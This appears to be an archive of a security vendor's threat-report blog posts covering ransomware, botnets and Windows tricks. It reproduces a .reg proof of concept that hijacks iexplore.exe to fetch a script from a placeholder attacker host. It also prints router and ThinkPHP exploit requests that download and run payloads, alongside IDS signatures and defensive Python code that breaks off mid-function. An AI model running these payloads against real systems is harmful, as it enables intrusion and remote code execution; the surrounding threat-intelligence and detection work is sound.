Other methods for bypassing Cylance are more complicated. For instance, it is possible to bypass the CylancePROTECT PowerShell control if you rename the PS executable, execute it, and modify it in memory after execution to avoid impacting the signature of the binary. Quite brilliant. You should really read the entire write-up on MDSec’s site for full details and more info about CylanceOPTICS.

VBA macro PoC for parent process spoofing

Most modern EDR solutions use behavioral detection, allowing the detection of malware based on how it behaves instead of solely using static indicators of compromise (IoC) like file hashes or domain names. In a recent post, Christophe gives a VBA implementation for two techniques allowing you to spoof both the parent process and the command line arguments of a newly created process. This implementation allows crafting stealthier Office macros, making a process spawned by a macro look like it has been created by another program such as explorer.exe, and has benign-looking command line arguments.

A Proof of Concept was released containing a VBA macro spawning a process with a spoofed parent and command line.

VBA Macro

Windows .reg file dialog box message spoofing

On March 10, a disclosure from @hyp3rlinx caught my eye related to dialog spoofing for Windows .reg files. Microsoft has not acknowledged it as a vulnerability, or perhaps did not understand what was being reported as one. Or maybe this is a feature working as intended. According to the researcher, they received a response from Microsoft MSRC saying, “A registry file was created with the title you suggested, but the error message was clear.” along with a link to the definition of a security vulnerability. It seems to me that if someone were able to override SSL certificate warning dialogs with a specially crafted certificate name, that would get some attention. Why is this not getting traction?

The Windows registry editor allows specially crafted .reg filenames to spoof the default registry dialog warning box presented to an end user. This could trick users into choosing the wrong option in the dialog box. Also, it’s possible to suppress the modification status (Win 10), hiding successful registry modifications.

Normally, when a user opens a .reg file, UAC will prompt first; after that they get the registry security warning dialog box asking whether they “trust the source” and “Are you sure you want to continue?”

However, it is possible to inject your own pop up message and suppress successful registry modifications through a crafted filename.

Typically, upon a successful import the registry editor pops up another dialog box with a status message telling us “the keys and values contained in have been successfully added to the registry”.

Here is a video of the PoC in action used to execute code from a remote host (you might want to mute the video) and here are steps to re-create it yourself:

1) Create a Windows .REG Registry file named.


Registry file contents:

Windows Registry Editor Version 5.00 

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe] 

"debugger"="rundll32.exe javascript:\"\\..\\mshtml,RunHTMLApplication\";document.write();GetObject(\"script:http://<ATTACKER-IP>/backdoor\")" 

2) Create an XML file named simply “backdoor”, hosted at http://ATTACKER-IP/backdoor; it will execute Windows calc.exe when Microsoft Internet Explorer is launched.

<?xml version="1.0"?> 
<component id="testCalc"> 
<script language="JScript"> 
new ActiveXObject("WScript.Shell").Run("calc.exe"); 
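
As an added defender-side check (not part of the write-up, which contains no code beyond the PoC), here is a small Python parser for .reg files that flags any Image File Execution Options “Debugger” value an import would install, which is exactly how the PoC above gets its payload to run. The sample .reg text, its key paths and the stage.exe path are constructed for the example.

```python
import re

# Constructed sample .reg file (not the write-up's PoC): an Image File Execution Options
# "Debugger" hijack of iexplore.exe pointing at a placeholder path, next to harmless values.
# The escaped quotes and the hex continuation line exercise the .reg syntax.
SAMPLE_REG = r'''Windows Registry Editor Version 5.00

; comment lines are allowed in .reg files
[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\iexplore.exe]
"Debugger"="\"C:\\Users\\Public\\stage.exe\" /q"

[HKEY_CURRENT_USER\Software\Example\Harmless]
@="default value"
"Setting"=dword:00000001
"Blob"=hex:01,02,\
  03,04
'''

# Lower-cased key prefix under which a "Debugger" value redirects process creation.
IFEO_PREFIX = (r"hkey_local_machine\software\microsoft\windows nt\currentversion"
               r"\image file execution options" "\\")

# "name"=value or @=value (the key's default value)
_VALUE = re.compile(r'^(?:"((?:[^"\\]|\\.)*)"|(@))=(.*)$')


def _unescape(raw):
    """Turn a quoted .reg string literal (with \\ and \" escapes) into its text."""
    if len(raw) >= 2 and raw[0] == '"' and raw[-1] == '"':
        body, out, i = raw[1:-1], [], 0
        while i < len(body):
            if body[i] == "\\" and i + 1 < len(body):
                out.append(body[i + 1])
                i += 2
            else:
                out.append(body[i])
                i += 1
        return "".join(out)
    return raw  # dword:/hex: data and the '-' delete marker are kept verbatim


def parse_reg(text):
    """Return {key_path: {value_name: value}}; keys slated for deletion ([-...]) are skipped."""
    keys, current = {}, None
    lines = text.splitlines()
    i = 0
    while i < len(lines):
        line = lines[i].strip()
        # hex data may continue on the next line after a trailing backslash
        while line.endswith("\\") and i + 1 < len(lines):
            i += 1
            line = line[:-1] + lines[i].strip()
        i += 1
        if not line or line.startswith(";"):
            continue
        if line.startswith("[") and line.endswith("]"):
            name = line[1:-1]
            current = None if name.startswith("-") else keys.setdefault(name, {})
            continue
        m = _VALUE.match(line)
        if m and current is not None:
            vname = m.group(1) if m.group(1) is not None else ""
            current[vname] = _unescape(m.group(3))
    return keys


def find_ifeo_debuggers(text):
    """List (target_exe, debugger_command) pairs that importing this .reg file would install."""
    hits = []
    for key, values in parse_reg(text).items():
        if not key.lower().startswith(IFEO_PREFIX):
            continue
        target = key[len(IFEO_PREFIX):].split("\\")[0]
        for vname, val in values.items():
            if vname.lower() == "debugger":
                hits.append((target, val))
    return hits


if __name__ == "__main__":
    for exe, cmd in find_ifeo_debuggers(SAMPLE_REG):
        print(f"IFEO debugger hijack: {exe} -> {cmd}")
```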

Release Notes

March 11, 2019

Allow opening navigation links in new tabs
Child Customer IP counts
Make comments more accessible
Side navigation revamp
Add option to open some links in existing or new tab
Since You’ve Been Gone does not wrap or truncate
No Analyzers to Run
Noisy alerts cause alert queue to back up
Some ConnectWise companies are not returned in configuration dropdown

Threat Report Thursday March 7th 2019

on March 7, 2019

This week we’re focusing on ransomware. Let’s take a look at two new pieces of ransomware, a ransomware infrastructure service, how ransomware is distributed, and what you can do about it. Spoiler, if you don’t already have plans to secure backups of your mission critical data, you’re going to make some after this week’s threat report.

Jokeroo RaaS is ready for your SaaS

Last week I predicted a GandCrab variant would be released on a specific underground, and looky here. There is a new Ransomware-as-a-Service (RaaS) being offered that originally marketed itself as GandCrab v2.

“Jokeroo RaaS” was recently discovered and is being promoted on underground forums and via Twitter. The program allows affiliates to gain access to fully functional ransomware and a payment server. A Ransomware-as-a-Service is an online service that allows affiliates to sign up and distribute the ransomware. Chatter shows that the Jokeroo RaaS began promoting itself as a GandCrab ransomware RaaS but later changed its name to Jokeroo RaaS.


To become an affiliate, would-be criminals pay to join with membership packages ranging from $90 up to $600 USD. This is another example of how the security marketplace and the threat marketplace are maturing together. We get Security-as-a-Service. They get Ransomware-as-a-Service.

It’s nothing personal, just business for CLOP ransomware

A new variant of ransomware has been discovered by researchers. Clop Ransomware, which appends the “.CLOP” extension to encrypted files, targets your entire network, not a single computer. Clop Ransomware is being distributed as code-signed executables with a digital certificate to appear more legitimate, which may help it bypass security software detections. In an analysis performed by the researchers, the malware creates a batch file named “clearnetworkdns_11-22-33.bat.”

Once executed, the malware terminates numerous Windows services and processes to disable any running antivirus software on the computer so that it can encrypt the victim’s files. In the final stage of the attack, the victim receives a ransom note containing the emails “”, “”, and “” that can be used to contact the attackers for payment instructions.

Malware Infrastructure-as-a-Service

Novel news on ransomware distribution

One of the primary distribution methods for ransomware is through email campaigns that include a link to a malicious file or attach a malicious file. The trick to having a good link lure is to have a reputable-looking site. Dark Web services make it easy for attackers to set up legitimate-looking infrastructure: registering domains, obtaining SSL certificates, and setting up e-commerce sites. Additionally, it can all be bundled with ransomware for a discount. This shared infrastructure and software make attribution harder for researchers by providing threat actors with cover in the form of shared threat indicators.

One of the premier underground marketplaces for this infrastructure and identity service is DreamMarket. According to researchers, “This package of products and services allows attackers to credibly present themselves as a trusted US or UK company for less than $2,000.”


On the email attachment side of spreading ransomware, attackers need to make sure that their attachments won’t be detected as suspicious in transit or when executed. A common file format for malspam or spear phishing is a Microsoft Office document.

Speaking of threaty threats, Office documents have been evading detection: the Equation Editor exploit has popped back up, chained with a previously unknown vulnerability. This exploit chain lets it slip past some native Windows security controls.

According to researchers, they “spotted an attacker group, which seems to originate from Serbia, using specially-crafted Microsoft Word documents to take advantage of how Microsoft Word handles Integer Overflow errors in the OLE file format. The group was able to exploit this vulnerability to circumvent many security solutions designed to protect data from infestation, including leading sandbox and anti-malware technologies.”

With new ransomware, ransomware infrastructure services, and 0-day vulnerabilities that bypass security controls, you can see that the focus is coming back to ransomware. Attackers are able to extract more money from ransomware than from cryptocurrency mining. Not all campaigns are asset aware and know the value of the data they have compromised. Once attackers mature in this area, they will deploy cryptocurrency miners when the asset they land on is not worth ransoming. I predict we’ll have some malware that can deploy either one, depending on a scan of the file system and open connections.

The most important thing that you can do to make sure your organization is protected from ransomware is to create secure backups that attackers will not be able to erase/encrypt. That may mean storing backups outside of IT’s normal span of control.

Docker vulnerability running wild with Monero miner

Not all infections are the result of lateral movement from infected end users. In a recent threat report we covered the Docker RunC vulnerability CVE-2019-5736.

CVE-2019-5736 allows the attacker to gain root access from a Docker container by overwriting the host runC binary as root. According to researchers, “3,822 Docker hosts with the remote API exposed publicly. The exposed Docker remote API has already been abused by attackers using the compromised hosts to mine cryptocurrency.” Researchers reported that the exposed Docker remote API IPs are running Monero cryptocurrency miners.

Although these Docker hosts were used to mine cryptocurrency, it would have been just as easy for the attackers to deploy ransomware. Since this was likely just a large scan of the Web and not a targeted campaign, the attackers had no idea if the assets had valuable data.

Bonus: Ghidra NSA reverse engineering tool

Oh yeah, RSA was this week and the NSA released an open source reverse engineering tool called Ghidra (and it has its own song). This sounds very cool and I like to see powerful tools made open source so we can get more people involved in solving problems. But I immediately reached for my tin foil hat.

Could it be that the NSA has released a reverse engineering tool that backdoors security researchers? Or, maybe it collects and ships home binaries and debug data to crowd source 0-day discovery? Luckily, researchers have already started looking into the source code.

Hacker Fantastic

Hacker Fantastic realized that when in debug mode Ghidra binds to all network interfaces on port 18001 and allows for remote code execution through the Java Debug Wire Protocol (JDWP). While it’s not atypical to have debug access like this, the docs don’t make it clear that this is happening, and it should not be binding to all interfaces as a default behavior. Ideally, Ghidra would default to localhost. The issue is being discussed on the NSA Ghidra repo. As a bonus to the bonus, here is a JDWP shellifier.

How can I help?

on March 5, 2019

“How can I help?” – seems like a simple question to ask. It wasn’t until I started watching a new medical drama last fall that I started asking this question myself. In the show, the premise of the question is supposed to invoke optimism and hope in a profession that is otherwise known for the bureaucratic red tape of the healthcare system. Fortunately, in my line of work it is not as regulated as this (even though it could be – let’s save that for another blog), but in asking this question of my colleagues, partners, and clients it has provided me a wealth of opportunity that I would otherwise not have experienced.

I’ve asked this question to colleagues and in turn have been placed on projects where I’ve had the pleasure of meeting new people and expanding my skillset. I’ve asked this question to partners to find out that the pain point wasn’t about price or lack of functionality, but rather their customers not understanding how to incorporate new technology. I’ve also asked this of clients to uncover their uncertainty of presenting a solution internally to leadership.

I ask not out of optimism or hope like the medical drama I watch, but from curiosity and empathy. What can I do to impact a given situation by asking a simple question? So, whether you’re a colleague looking for advice or just a conversation over coffee, a partner looking to create a new revenue stream or operationalize your business, or a client looking for someone to listen to them – I leave you with this…How can I help?

Release Notes

February 28, 2019

  • Managing providers can see their customers’ providers to help coordinate responses to threats
  • Filter by geo points in Perchybana
  • Dashboards in Perchybana now support src_ip

  • Bug fixes and tweaks for the new navigation
  • Fixed a bug where status was not displaying in some alert status change emails

Threat Report Wednesday February 27th 2019

on February 27, 2019

Welcome back to our regularly scheduled weekly threat report. There was malware last week. There is malware this week. And, there will be malware for the foreseeable future. Oh, and malware’s best friend, some vulnerabilities too.

Hackers turn to LinkedIn for More_Eggs

Since mid-2018, a campaign spreading More_Eggs malware has targeted U.S. companies in industries that commonly use online payment portals like retail, entertainment, and pharmacy. More_Eggs spreads via LinkedIn’s legitimate direct messaging service, offering fake jobs to victims and repeatedly following up via email to deliver the backdoor More_Eggs. In direct follow-up emails, the actor pretends to be from a staffing company with an offer of employment. In many cases, the actor points the victim to a fake website that impersonates a legitimate staffing company and hosts the malicious payload. In other cases, the actor uses malicious attachments to directly distribute More_Eggs. The actor uses LinkedIn scraping, multistep contacts with recipients, personalized lures, and multiple varied attack techniques to distribute More_Eggs – indicating increasing effectiveness of layered defenses.

This activity sounds a lot like the near breach of Redbanc, Chile’s interbank ATM network, that we included in a threat report from January 2019. At the time, researchers found the exe downloaded was PowerRatankba and attributed it to Lazarus (aka Hidden Cobra).

Users are advised to exercise caution when viewing messages from suspicious senders, avoid clicking links or attachments from such senders, and employ a blend of antivirus and network security monitoring to best mitigate the risk of attack. The following indicators of compromise were released with researchers’ findings.

Malware from OneDrive

When threat actors are considering a campaign, one of the things that must be closely considered is where will the payload be hosted? In malspam campaigns, attackers have an option to include an attachment, but many security solutions scan email for suspicious attachments or strip attachments altogether. For threat actors concerned with their attachments not making it through security controls, they have a choice to include a link and hope they can lure the user into clicking the link, downloading the malicious file, and executing it.

In a recent campaign, researchers observed a familiar lure to download some malicious software PACKING LIST AND LPO DOC.exe, but this malicious software masquerading as a document was being hosted on Microsoft’s OneDrive. This points out some pain for the blue team. Some valid observables here include a Microsoft IP, a Microsoft domain, and a Microsoft URL. Yes, they are valid observables for this campaign, but if you try to use the Microsoft IP and domain as an indicator you will end up with an extremely high ratio of false positive alerts. The best indicators here are the file hash, the dynamic DNS host name, and any IPs not related to Microsoft.

Chinese ransomware authors move to Russia for reliability

The ransomware author responsible for FilesL0cker Ransomware is jumping ship. Based on discussion from (the Russian forum where Gandcrab was born) the actor said they are moving away from their own ransomware due to technical issues in favor of GandCrab ransomware. The underlying issue is that FilesL0cker could prevent decryption of an infected host’s data even after obtaining the decryption key.

This sounds like a bug in the software that the author cannot figure out. And it is understandable why it is a concern for the authors. People have learned to pay the ransom because they can trust that the files will be decrypted. If your ransomware is not reliably decrypting even with the correct key, then you have unhappy customers who tell others, your ransomware gets a reputation, and people stop paying the ransom. The threat actor’s wallet is probably already feeling the pain of unpaid infections, because they understand their Net Promoter Score (NPS) has seriously tanked. I wouldn’t be surprised if FilesL0cker is pretty much doomed at this point. We should expect a rebranding under a FilesL0cker/Gandcrab variant.

Go-lang brute-forcer targets Magento E-commerce sites

E-commerce websites are regularly targeted by online criminals for multiple reasons. Recently, attacks have been conducted via a skimmer, which is a piece of code that is either directly injected into a hacked site or referenced externally. This is similar to attacks carried out by the Magecart threat actor we have previously written about. The purpose of this skimmer is to watch for user input, in particular around online shopping carts, and send the perpetrators that data, such as credit card numbers and passwords, in clear text.

Compromising e-commerce sites can be achieved in more than one way. Vulnerabilities in popular Content Management Systems like Magento, as well as in various plugins, are commonly exploited these days. But because many website owners still use weak passwords, brute force attacks are a viable option. A recent campaign shows evidence of this. Researchers have discovered a new Go-based brute forcing malware that focuses on Magento, phpMyAdmin, and cPanel. A number of Magento sites have been compromised and skimmers have been installed. For an in-depth analysis of this threat, check out the research from Malwarebytes.

Two critical patches for Adobe Reader and Acrobat

On February 12, 2019, Adobe released a security patch addressing CVE-2019-7089 in Adobe Reader, which can be triggered via a malicious PDF to perform an SMB call-back, revealing an NTLMv2 hash. This could lead to a breach of an organization or a single user.

On February 21, 2019, another vulnerability was discovered, tracked as CVE-2019-7815 and affecting Adobe Acrobat and Reader version 2019.010.20098. Adobe’s disclosure of the first flaw raised the risk of exploitation, since anyone looking to exploit the first issue might stumble across the second. Users should keep software up to date with timely patches to prevent exploitation. An in-depth technical analysis from researchers is available.

Perch Security Lands Cybersecurity Gold

Perchy on February 25, 2019

Perch Security has received multiple awards in the 2019 Cybersecurity Excellence Awards. This is the second year in a row Perch Security has placed, outperforming last year in every eligible category.

Perch Security placed as the:

  • Gold Winner for Security Monitoring
  • Gold Winner for Intrusion Detection & Prevention
  • Silver Winner for Best Cybersecurity Startup (between 10 and 49 employees)
  • Silver Winner for Threat Detection, Intelligence and Response

“Congratulations to Perch Security for being recognized as the gold winner in the product categories Security Monitoring and Intrusion Detection & Prevention, as a silver winner in the category Threat Detection, Intelligence and Response, and as a silver winner in the Best Cybersecurity Startup category of the 2019 Cybersecurity Excellence Awards,” said Holger Schulze, CEO of Cybersecurity Insiders and founder of the 400,000-member Information Security Community on LinkedIn that co-produces the awards program. “With over 500 entries in more than 90 award categories, the 2019 awards are highly competitive, and all winners truly reflect the very best in today’s cybersecurity industry.”

Perch consumes and automates your threat intelligence and uses it to detect any sign of threat lurking on your network, while our Security Operations Center (SOC) analyzes any detected signs of cyber threat activity. Customers are notified immediately of any validated threat activity on networks they manage.

Interested in learning more about Perch Security? Visit us online, send us a Slack, or Tweet.

Threat Report Friday February 22nd 2019

on February 22, 2019

This week we’re breaking from our regular coverage to bring you a follow up from Perch security researchers. We’ve got a lot of malware related information to highlight some active botnets and possible relationships between various strains. Additionally, we provide details on two recently spun up malware campaigns that are making waves.

Cayosin gets a Tsunami of an Update

On February 3, 2019, we broke the news about an emerging botnet, Cayosin. We observed Cayosin ramping up on January 7, 2019 and linked it to an Instagram account where the author announced finishing the malware on the same date. That Instagram account has since been abandoned; however, we learned that the Cayosin source code was available for sale because the malware author was ready to spin up a new version of Cayosin with new features, Cayosin v3. So, keep your eyes peeled for signs of a new version.

While researching Cayosin, we found indicators of other malicious botnets likely deployed by the same group of actors. Some of the bots are still active while others have gone dormant. We mentioned it briefly in our first report, and in the follow-up with Dark Reading we linked Cayosin and Yowai together. But we left the details light while we sifted through the information.

As a result of our research, Perch tracked down over twenty active botnets that all target command execution vulnerabilities in Linux IoT devices, routers, and Web applications. Some of these are new and some have been previously reported on.

We believe Cayosin, Kowai, Yowai, Infinity, Corona, Cock, and Tsunami (aka Kaiten) are likely related to the same group. One of the most active pieces of malware we found was a version of Tsunami that was likely recycled by the group, or maybe the original coverage of Tsunami is related as well. Others like Rift, lessie, Okiru, Hentai, Solstice, Damien, Cakle, Solar, LMAO, Sefa, Karu, Hakai, Gemini, Trinity, Ronin, xd, Shaolin, and Yakuza may just share similar characteristics. Over the last 30 days, consistent activity from all of these botnets is like background radiation, but if you look close enough you can see when each started.

30 days of botnet activity

Status: Active
First Observed: 2019-01-06

Kowai v1
Status: Inactive
Last Observed: 2019-01-20
SHA256: 284269344b15afe2fe74cf79129c4b69493a9bdbff8ea9dff9e97f23b4923054

Status: Active
First Observed: 2019-01-12
SHA256: dc372ee5f8ce6e57f7ffb990ea15bcd737809fc59a9c7af5bcdbaba2cc959fc2
MD5: 9472bd51a84eaa37ed7e336e3fe05180

Tsunami (Kaiten)
Status: Active
First Observed: 2019-01-21
SHA256: 127ab7ed62a506fa7b0dab479f2e15b48da0d0a6d1504488d735c74dfb7bce5f

Status: Active
First Observed: 2019-01-25

Status: Active
First Observed: 2019-01-27
Filename: cock.x86
Hash: 9195f6c305cfe1c426d4a37365a6b7e7fbf5535742be59b5bd7fbefc937c3ddd
MD5: 3d3982d64ec4248aaa0338dd3de76ab2

We found these botnets by correlating similar exploit payloads, http request metadata, and source IP addresses. What we found was that a large number of initial scans were from the subnet, which belongs to KV Solutions, a Virtual Private Server (VPS) provider in the Netherlands. We’re not the first to notice KV Solutions. If you check out their reviews on Google, you’ll see KV Solutions getting called out by a possible victim for ignoring malicious activity on their network.

Negative review for KV Solutions

Tinfoil hat time; maybe the translation is bad. Maybe the Wiz meant that hackers in Oekranie (Ukraine) use KV Solutions because they allow unscrupulous customers. Once we focused on traffic coming from KV Solutions, we found a flood of threat indicators pouring out of their network. Most of the HTTP exploit payloads contained an HTTP User-Agent consisting of a single word (the malware name) followed by “/1.0” or “/2.0.” This info helped us find additional hosts serving up the second stage payloads, which are typically, but not exclusively, hosted on a KV Solutions IP.

After retrieving the second stage binary, the Linux host is infected and adds itself to whatever botnet landed an infection. The infected host will begin scanning, DDoS’ing, and exploiting other hosts on command. Based on data from for the KV Solutions netblock, 149 of the 254 possible IPs have at least one abuse complaint against them. The earliest reported abuse complaint we reviewed was early-mid 2018.

There is no indication that KV Solutions is involved in this activity. It is possible that they are unaware of active threats in their network. When the KV Solutions abuse contact was notified of an abuse complaint on Kowai via URLhaus, they took down the Tsunami binaries in 16 hours. That’s better than the 10 days it took DigitalOcean to take down the Kowai 1.0 binaries. Regardless of the binaries being offline, there are still a large number of actively infected hosts that are still connected to a command and control. That means the attackers can still pivot the infected hosts with an update or just re-infect them with entirely new malware. We did see that the threat actors are selling and sharing IP lists from previous runs so they can build up their botnets faster.

Here are some popular examples of scanning attacks we saw raining across the World Wide Web:

ThinkPHP 5.x Remote Code Execution 

GET /index.php?s=/index/.hink.pp/invokefunction&function=call_user_func_array&vars[0]=shell_exec&vars[1][]= 'wget http://<ip>/<path to file|<file> -O /tmp/<tmp name>; chmod 777 /tmp/<tmp name>; /tmp/<name> <execute>' 

D-Link Router DSL-2750B OS Command Injection 

GET /login.cgi?cli=aa%20aa%27;wget%20http://<ip>/<path>|<file>%20-O%20-%3E%20/tmp/<file>;sh%20/tmp/<file>%27$ 

Linksys Router E-Series Remote Code Execution 

POST /tmUnblock.cgi 


GPON Router Authentication Bypass & Remote Code Execution 

POST /GponForm/diag_Form?images/ 


Kowai cracks open two thousand Linux hosts in first two hours

The name of the botnet and second stage binary change, but the exploits have stayed the same over the years. The exploit activity against these vulnerabilities is not new and will not be gone any time soon, but at least Perch can drip feed some visibility to other blue teamers.

Some say that Netis Netcore vulnerable hosts are all gone now or blocked by carriers, but maybe actors were not scanning the right networks for vulnerable hosts. On February 9, 2019 at approximately 7 p.m. CST, a new version of Kowai came online and started making waves, infecting 2,000 hosts in the first two hours of operation. To validate this, look for a spike of traffic on port 53413 around this time. Don’t confuse this with the earlier version of Kowai. We believe that was just a beta test that was forgotten and put aside.

Over the last 30 days, we have observed 22 HTTP User-Agents used by different botnets performing similar attacks. We have broken into Melty’s stash of signatures and included some for these User-Agents at the end of this report.

U.S. gets Rekt by botnet targeting Elastic, Redis, Oracle, and Asterisk

Not all emerging malware botnets make themselves as obvious. One payload caught our eye because it used a different technique that was a little stealthier. Instead of immediately giving away the second stage payload location, it probes for a vulnerability before trying an exploit. This effectively keeps the operators from showing their cards and having their infrastructure shut down. Looking back, the campaign was first observed on January 18, 2019 with a single event targeting the U.S. from Australia. Then it was just a handful of events from Asia and Europe. It looks like Rekt has pivoted to the United States, and we’re seeing tons of scan-related activity. One indicator we observed was HTTP requests with an eight-year-old Firefox User-Agent, “Mozilla/5.0 (Windows; U; Windows NT 6.0;en-US; rv:1.9.2) Gecko/20100115 Firefox/3.6)”

Since it started, we’ve identified nearly 3,000 scanning IPs. That’s just the tip of the iceberg. This botnet could control over 30,000 scanning IPs.

Rekt botnet activity

The HTTP requests were consistently looking for target URLs like “/TP/public/index.php”, “/TP/index.php”, “/thinkphp/html/public/index.php”, “/TP/html/public/index.php”, “/html/public/index.php”, “/public/index.php”, and last but not least “/elrekt.php”

The ThinkPHP scanning looks very similar to other scanning activity, but instead of going for the kill and executing PHP code immediately to infect the host, the malware probes for a response from phpinfo. This keeps the target from learning the location of the second stage binary. It also appears that the second stage binaries are served from distributed hosts rather than a central one, which will make it much harder to shut down. We have found no other valid traffic to elrekt.php, and Googling “elrekt php” returns few results. This could be a webshell that gets implanted on the webserver after exploitation, or some unknown vulnerable software. It’s fun to say, so we’ve started calling this Rekt.

In addition to looking for Linux code execution vulnerabilities in Web applications, Rekt looks for open and vulnerable services. Based on the ports that are actively being scanned, it is looking for open Redis servers, Elastic servers, Asterisk Web GUIs, and Oracle Web Logic Server. Presumably if it found an open server it would probe for vulnerability and then attempt exploit there too. Happy hunting!

IDS Signatures

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Yowai Botnet User-Agent Observed"; flow:established,to_server; content:"Yowai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000003; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Tsunami Botnet User-Agent Observed"; flow:established,to_server; content:"Tsunami/2.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000004; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Kowai Botnet User-Agent Observed"; flow:established,to_server; content:"Kowai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000005; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Yakuza Botnet User-Agent Observed"; flow:established,to_server; content:"Yakuza/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000006; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Rift Botnet User-Agent Observed"; flow:established,to_server; content:"Rift/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000007; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent lessie Botnet User-Agent Observed"; flow:established,to_server; content:"lessie/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000008; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Hakai Botnet User-Agent Observed"; flow:established,to_server; content:"Hakai/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000009; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Hentai Botnet User-Agent Observed"; flow:established,to_server; content:"Hentai/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000010; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Solstice Botnet User-Agent Observed"; flow:established,to_server; content:"Solstice/2.0"; http_user_agent; nocase; depth:12; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000011; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Damien Botnet User-Agent Observed"; flow:established,to_server; content:"Damien/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000012; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Cakle Botnet User-Agent Observed"; flow:established,to_server; content:"Cakle/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000013; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Solar Botnet User-Agent Observed"; flow:established,to_server; content:"Solar/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000014; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent LMAO Botnet User-Agent Observed"; flow:established,to_server; content:"LMAO/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000015; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Gemini Botnet User-Agent Observed"; flow:established,to_server; content:"Gemini/2.0"; http_user_agent; nocase; depth:10; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000016; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Trinity Botnet User-Agent Observed"; flow:established,to_server; content:"Trinity/2.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000017; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Ronin Botnet User-Agent Observed"; flow:established,to_server; content:"Ronin/2.0"; http_user_agent; nocase; depth:9; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000018; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Karu Botnet User-Agent Observed"; flow:established,to_server; content:"Karu/2.0"; http_user_agent; nocase; depth:8; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000019; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent xd Botnet User-Agent Observed"; flow:established,to_server; content:"xd/2.0"; http_user_agent; nocase; depth:6; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000020; rev:1;) 

alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Shaolin Botnet User-Agent Observed"; flow:established,to_server; content:"Shaolin/1.0"; http_user_agent; nocase; depth:11; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000021; rev:1;) 
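The rules above encode more than a substring match, and it is worth seeing exactly what they mean before tuning them. The Python below is an added example, not part of the rule set or of Perch's sensor code: it reads two of the rules, pulls out each User-Agent string with its modifiers, and applies the same semantics (nocase, depth, isdataat:!1,relative) to a handful of HTTP records constructed for the example in the shape of Suricata eve.json http events. The practical point is that depth equal to the string length together with isdataat:!1,relative means the whole header must equal the string, so a browser UA that merely contains “xd/2.0” does not fire, and neither does “Solstice/2.0 (compatible)”.

```python
import re

# Two of the rules above, embedded verbatim so this runs stand-alone.
RULES = r'''
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent Solstice Botnet User-Agent Observed"; flow:established,to_server; content:"Solstice/2.0"; http_user_agent; nocase; depth:12; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000011; rev:1;)
alert http $HOME_NET any -> $EXTERNAL_NET any (msg:"[Melty] User-Agent xd Botnet User-Agent Observed"; flow:established,to_server; content:"xd/2.0"; http_user_agent; nocase; depth:6; fast_pattern; isdataat:!1,relative; classtype:trojan-activity; sid:9000020; rev:1;)
'''

RULE_RE = re.compile(
    r'msg:"(?P<msg>[^"]+)";.*?content:"(?P<content>[^"]+)";\s*http_user_agent;'
    r'(?P<opts>[^)]*?)sid:(?P<sid>\d+);'
)

def parse_rules(text):
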